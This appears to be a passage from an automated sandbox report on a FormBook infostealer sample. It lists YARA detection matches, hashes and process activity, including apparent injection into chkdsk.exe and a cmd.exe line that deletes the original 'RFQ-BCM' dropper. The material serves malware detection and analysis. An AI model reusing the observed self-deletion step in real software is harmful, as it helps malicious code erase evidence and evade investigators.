                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:11:55:33
                                                                                                                        Start date:16/06/2021
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                        Imagebase:0x7ff693d90000
                                                                                                                        File size:3933184 bytes
                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:11:55:50
                                                                                                                        Start date:16/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                        Imagebase:0x200000
                                                                                                                        File size:23040 bytes
                                                                                                                        MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Start time:11:55:55
                                                                                                                        Start date:16/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:/c del 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
                                                                                                                        Imagebase:0x190000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:11:55:55
                                                                                                                        Start date:16/06/2021
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Disassembly

                                                                                                                        Code Analysis
